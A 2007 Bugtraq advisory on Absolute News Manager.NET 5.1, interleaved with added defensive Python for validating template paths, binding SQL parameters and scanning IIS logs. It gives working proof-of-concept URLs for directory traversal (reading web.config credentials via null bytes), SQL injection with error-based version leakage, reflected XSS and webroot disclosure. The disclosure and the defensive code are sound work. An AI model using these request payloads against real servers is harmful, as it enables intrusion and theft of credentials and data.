
List:       bugtraq
Subject:    PR07-39: Multiple vulnerabilities on Absolute News Manager.NET
From:       research () procheckup ! com
Date:       2007-12-04 14:20:36
Message-ID: 20071204142036.22514.qmail () securityfocus ! com

PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection

Vulnerabilities found: 16 November 2007

Vendor informed: 19 November 2007

Vulnerability fixed: 28 November 2007

Severity: High

Description: 

Multiple vulnerabilities were found on Absolute News Manager.NET 5.1:

- unauthenticated file retrieval (directory traversal) on '/pages/default.aspx'

- unauthenticated SQL injection on 'xlaabsolutenm.aspx' and possibly '/pages/default.aspx'

- XSS on 'xlaabsolutenm.aspx' and '/pages/default.aspx'

- webroot disclosure on 'getpath.aspx'


File retrieval PoC:

The following URL shows the contents of .NET 'web.config' (contains DB credentials):
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=../web.config

The following URL shows the contents of the vulnerable script itself:
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=default.aspx%00


Note: in order to obtain the content of '.aspx' files, a null byte '%00' must be added after the filename.

Show content of other scripts:

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer.ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../default.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../PPL1HistoryTicker.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolutenm.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../streamconfig.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../articlefiles/r.asp%00
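As an added, defender-side example (not part of the advisory and not Xigla's code), the following Python shows how a template-selection parameter such as the one in the PoCs above can be validated so that traversal and null-byte inputs are rejected before any file is opened. The template root, the allowlist of template names and the query strings fed to it are assumptions constructed for illustration; the checks themselves are generic.

```python
import posixpath
from typing import List
from urllib.parse import parse_qs

# Assumed layout (not the product's real directory structure): templates live
# under TEMPLATE_ROOT and only the names below are legitimate template files.
TEMPLATE_ROOT = "/inetpub/site/CustomerDefinedDir/pages/templates"
ALLOWED_TEMPLATES = {"default.tpl", "print.tpl", "rss.tpl"}


class TemplateRejected(ValueError):
    """Raised when the 'template' parameter fails validation."""


def canonical_under_root(root: str, name: str) -> bool:
    """Return True if root/name, after resolving '..' segments, is still under root.

    This is the check that stops '../web.config': normpath collapses the
    traversal and the result no longer shares the root prefix.
    """
    candidate = posixpath.normpath(posixpath.join(root, name))
    return posixpath.commonpath([root, candidate]) == root


def resolve_template(user_value: str) -> str:
    """Map the untrusted 'template' value to an absolute path, or raise.

    Each check corresponds to one trick used in the advisory's PoCs:
    NUL bytes (%00 after the filename), '..' traversal, and asking for a
    file that is not a template at all (web.config, .aspx/.ascx sources).
    """
    if not user_value:
        raise TemplateRejected("empty template name")
    # 1. A NUL byte can truncate the name seen by a later extension check.
    if "\x00" in user_value:
        raise TemplateRejected("NUL byte in template name")
    # 2. Canonicalise and confirm the path stays inside the template root.
    if not canonical_under_root(TEMPLATE_ROOT, user_value):
        raise TemplateRejected("template resolves outside the template root")
    # 3. Even inside the root, only known template files may be read.
    if user_value not in ALLOWED_TEMPLATES:
        raise TemplateRejected("template not in allowlist")
    return posixpath.join(TEMPLATE_ROOT, user_value)


def is_safe_template(user_value: str) -> bool:
    """Boolean wrapper around resolve_template for quick checks."""
    try:
        resolve_template(user_value)
    except TemplateRejected:
        return False
    return True


def template_from_query(query: str) -> str:
    """Extract and URL-decode the 'template' parameter from a raw query string.

    parse_qs performs the percent-decoding a web server would, so '%00'
    arrives here as a real NUL byte, exactly as the vulnerable code saw it.
    """
    values = parse_qs(query, keep_blank_values=True).get("template", [])
    return values[0] if values else ""


def check_queries(queries: List[str]) -> List[bool]:
    """Evaluate several raw query strings; True means the template is acceptable."""
    return [is_safe_template(template_from_query(q)) for q in queries]


if __name__ == "__main__":
    # Constructed inputs mirroring the advisory's PoC query strings plus one benign request.
    for q in ["a=1&template=default.tpl",
              "a=1&template=../web.config",
              "a=1&template=default.aspx%00",
              "a=1&template=../anmviewer.ascx%00"]:
        verdict = "accept" if is_safe_template(template_from_query(q)) else "reject"
        print(f"{q!r:45} -> {verdict}")
```

The order of the checks matters: the NUL test comes first because a NUL can make a later string comparison or extension check see a shorter name than the file system does, and the allowlist comes last as the control that holds even if a canonicalisation quirk slips through.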


SQL injection PoCs:

Vulnerable script: /[CustomerDefinedDir]/xlaabsolutenm.aspx
Vulnerable parameters: z, pz, ord, sort 

Requesting the following URL returns the version of Windows and SQL server:

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&


System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb  9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.

Other URLs:

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=headline&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1em&target=iframe&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED_PAYLOAD&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_PAYLOAD&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=posted&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=posted&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=only&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_PAYLOAD&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort=posted&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort=posted&


The script '/pages/default.aspx' might also be vulnerable to SQL injection but it has not been confirmed.

Requesting the following URLs:

http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=40&z=9999999999999
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=9999999999999&z=1

return the following error:

System.Data.SqlClient.SqlException: Error converting data type nvarchar to int.
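An added example, not from the advisory or the vendor, of how the four parameters named above (z, pz, ord, sort) can be validated and bound so that input such as z=@@version or a quote appended to sort never reaches the SQL engine as syntax. Integer values are bound as parameters; sort and ord, which land in ORDER BY where binding is impossible, are checked against a fixed allowlist. An in-memory SQLite table stands in for the product's article table; the schema, the column names, the sample rows and the page-size meaning given to pz are all assumptions.

```python
import re
import sqlite3
from typing import List, Tuple

# Assumed schema standing in for the product's article table; the real
# column layout of Absolute News Manager.NET is not known from the advisory.
SCHEMA = """
CREATE TABLE articles (
    articleID  INTEGER PRIMARY KEY,
    categoryID INTEGER NOT NULL,
    headline   TEXT    NOT NULL,
    posted     TEXT    NOT NULL
);
"""
# Constructed rows, not real content.
SAMPLE_ROWS = [
    (1, 6, "First story", "2007-11-01"),
    (2, 6, "Second story", "2007-11-05"),
    (3, 7, "Other category", "2007-11-03"),
]

# 'sort' and 'ord' end up in ORDER BY, where identifiers and keywords cannot be
# bound as parameters; the only safe option is a fixed allowlist. The three
# sort values are the ones that appear in the advisory's URLs.
SORT_COLUMNS = {"articleID", "headline", "posted"}
ORDER_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}
_INT_LIST = re.compile(r"\d{1,9}(,\d{1,9})*")
_INT = re.compile(r"\d{1,9}")


class BadParameter(ValueError):
    """Raised for any request parameter that fails validation."""


def parse_id_list(value: str) -> List[int]:
    """'z' is a comma-separated list of integer ids (the advisory shows z=1,7)."""
    if not value or not _INT_LIST.fullmatch(value):
        raise BadParameter(f"z is not an integer list: {value!r}")
    return [int(v) for v in value.split(",")]


def parse_int(name: str, value: str) -> int:
    """Strict integer parse: a trailing quote or @@version fails the regex."""
    if not value or not _INT.fullmatch(value):
        raise BadParameter(f"{name} is not an integer: {value!r}")
    return int(value)


def build_query(z: str, sort: str, ord_: str, pz: str = "10") -> Tuple[str, List[object]]:
    """Return (sql, bound parameters). Values are bound; identifiers are allowlisted.

    pz is treated here as a page size (an assumption about its role).
    """
    ids = parse_id_list(z)
    limit = parse_int("pz", pz)
    if sort not in SORT_COLUMNS:
        raise BadParameter(f"sort not allowed: {sort!r}")
    if ord_ not in ORDER_DIRECTIONS:
        raise BadParameter(f"ord not allowed: {ord_!r}")
    placeholders = ",".join("?" * len(ids))
    sql = (
        f"SELECT articleID, headline FROM articles "
        f"WHERE categoryID IN ({placeholders}) "
        f"ORDER BY {sort} {ORDER_DIRECTIONS[ord_]} LIMIT ?"
    )
    return sql, [*ids, limit]


def fetch_articles(conn: sqlite3.Connection, z: str, sort: str, ord_: str, pz: str = "10"):
    """Validate, build and execute; only placeholders ever carry user data."""
    sql, params = build_query(z, sort, ord_, pz)
    return conn.execute(sql, params).fetchall()


def demo_db() -> sqlite3.Connection:
    """In-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def is_accepted(z: str, sort: str, ord_: str, pz: str = "10") -> bool:
    """True if the parameter set passes validation, False if it would be rejected."""
    try:
        build_query(z, sort, ord_, pz)
    except BadParameter:
        return False
    return True


if __name__ == "__main__":
    db = demo_db()
    print(fetch_articles(db, "6", "posted", "desc"))
    for probe in (("@@version", "posted", "desc", "9"),
                  ("10", "headline'INJECTED_PAYLOAD", "asc", "10")):
        print(probe, "->", "accepted" if is_accepted(*probe) else "rejected")
```

Rejecting at validation time, rather than escaping, also changes what the server discloses: a malformed z produces a generic 400-style response from the application instead of the SqlException text quoted above, which is what leaked the SQL Server and Windows versions.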


XSS PoCs:

Vulnerable script: '/xlaabsolutenm.aspx'
Unsanitized parameter: 'rmore'

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=articleID&ord=desc&rmore=%3Cscript%3Ealert(1)%3C/script%3E&size=2&h=abc&isframe=y


Vulnerable script: '/pages/default.aspx'
Unsanitized parameter: 'template'

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ealert(2)%3C/script%3E


Webroot PoC:

Requesting the 'getpath.aspx' demo script discloses the physical path of the webroot, i.e.:

http://target.tld/[CustomerDefinedDir]/getpath.aspx

	"
	Absolute News Manager Physical Path :
	D:\inetpub\target.tld\[CustomerDefinedDir]\

	Please delete this file from your installation.
	"

Consequences: 

Contents of any files on the web server can be obtained. Unauthorized SQL queries can be injected. Scripting code can be run within the security context of the target domain. Information about the target environment can be extracted.
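For teams that cannot apply the vendor update immediately, the following Python is an added example (not from the advisory, ProCheckUp or Xigla) of retrospective detection over IIS W3C logs for the four issue classes described above: traversal or a null byte in 'template', non-numeric z/pz or non-allowlisted ord/sort on xlaabsolutenm.aspx, a script tag in any parameter, and any request for getpath.aspx. The log excerpt is constructed, with '/news' standing in for [CustomerDefinedDir]; the allowlisted sort values are the three that appear in the PoC URLs.

```python
import re
from typing import Dict, Iterator, List, Tuple
from urllib.parse import parse_qs

# Constructed IIS W3C extended log excerpt (not a real capture). The query
# strings reproduce the advisory's PoC requests plus two benign requests;
# '/news' stands in for [CustomerDefinedDir].
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2007-11-16 10:00:01 10.0.0.5 GET /news/pages/default.aspx a=1&template=default.tpl 80 - 192.0.2.10 Mozilla/4.0 200
2007-11-16 10:00:02 10.0.0.5 GET /news/pages/default.aspx a=1&template=../web.config 80 - 192.0.2.10 Mozilla/4.0 200
2007-11-16 10:00:03 10.0.0.5 GET /news/pages/default.aspx a=1&template=default.aspx%00 80 - 192.0.2.10 Mozilla/4.0 200
2007-11-16 10:00:04 10.0.0.5 GET /news/xlaabsolutenm.aspx z=6&pz=9&featured=n&ord=desc&sort=posted&rmore=-& 80 - 192.0.2.22 Mozilla/4.0 200
2007-11-16 10:00:05 10.0.0.5 GET /news/xlaabsolutenm.aspx z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-& 80 - 192.0.2.10 Mozilla/4.0 500
2007-11-16 10:00:06 10.0.0.5 GET /news/xlaabsolutenm.aspx z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-& 80 - 192.0.2.10 Mozilla/4.0 500
2007-11-16 10:00:07 10.0.0.5 GET /news/xlaabsolutenm.aspx z=1,7&sort=articleID&ord=desc&rmore=%3Cscript%3Ealert(1)%3C/script%3E&size=2&h=abc&isframe=y 80 - 192.0.2.10 Mozilla/4.0 200
2007-11-16 10:00:08 10.0.0.5 GET /news/getpath.aspx - 80 - 192.0.2.10 Mozilla/4.0 200
"""

SORT_ALLOWED = {"articleid", "headline", "posted"}
ORD_ALLOWED = {"asc", "desc"}
_INT_LIST = re.compile(r"\d+(,\d+)*")
_SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per record, using the '#Fields:' directive to name the columns."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if fields and len(parts) == len(fields):
            yield dict(zip(fields, parts))


def analyse_request(uri_stem: str, uri_query: str) -> List[str]:
    """Return a list of finding tags for one request, empty if nothing matched."""
    findings: List[str] = []
    stem = uri_stem.lower()
    script = stem.rsplit("/", 1)[-1]
    query = "" if uri_query == "-" else uri_query  # IIS logs '-' for no query
    # parse_qs percent-decodes, so %00 becomes a NUL and %3C becomes '<'
    params = {k.lower(): v[0] for k, v in
              parse_qs(query, keep_blank_values=True).items()}

    if script == "getpath.aspx":
        findings.append("getpath-demo-script")

    if stem.endswith("/pages/default.aspx") or stem.endswith("/pages/"):
        tpl = params.get("template", "")
        if "\x00" in tpl:
            findings.append("template-null-byte")
        if ".." in tpl or "/" in tpl or "\\" in tpl:
            findings.append("template-traversal")

    if script == "xlaabsolutenm.aspx":
        for name in ("z", "pz"):
            if name in params and not _INT_LIST.fullmatch(params[name]):
                findings.append(f"sqli-probe:{name}")
        if "ord" in params and params["ord"].lower() not in ORD_ALLOWED:
            findings.append("sqli-probe:ord")
        if "sort" in params and params["sort"].lower() not in SORT_ALLOWED:
            findings.append("sqli-probe:sort")

    for name, value in params.items():
        if _SCRIPT_TAG.search(value):
            findings.append(f"xss-probe:{name}")
    return findings


def scan_log(text: str) -> List[Tuple[str, str, List[str]]]:
    """Run analyse_request over every record; return (client ip, script, findings) for hits."""
    hits = []
    for rec in parse_w3c(text):
        findings = analyse_request(rec["cs-uri-stem"], rec["cs-uri-query"])
        if findings:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], findings))
    return hits


if __name__ == "__main__":
    for ip, stem, findings in scan_log(SAMPLE_LOG):
        print(f"{ip:12} {stem:28} {', '.join(findings)}")
```

The parser takes the column names from the '#Fields:' line rather than hard-coding positions, so the same function works on logs with a different field selection. A 500 status on xlaabsolutenm.aspx is a useful secondary signal for the SQL probes, since the advisory shows that malformed z values surface as unhandled SqlException errors.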

Fix:

http://www.xigla.com/security/
http://www.xigla.com/security/ANMNET51-SecurityUpdate20071128.zip

Note: ProCheckUp has NOT tested the patch provided by Xigla Software.


References: 

http://www.procheckup.com/Vulnerability_2007.php
http://www.xigla.com/absolutenmnet/


Credits: Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd (www.procheckup.com)

ProCheckUp thanks Xigla Software for working with us.

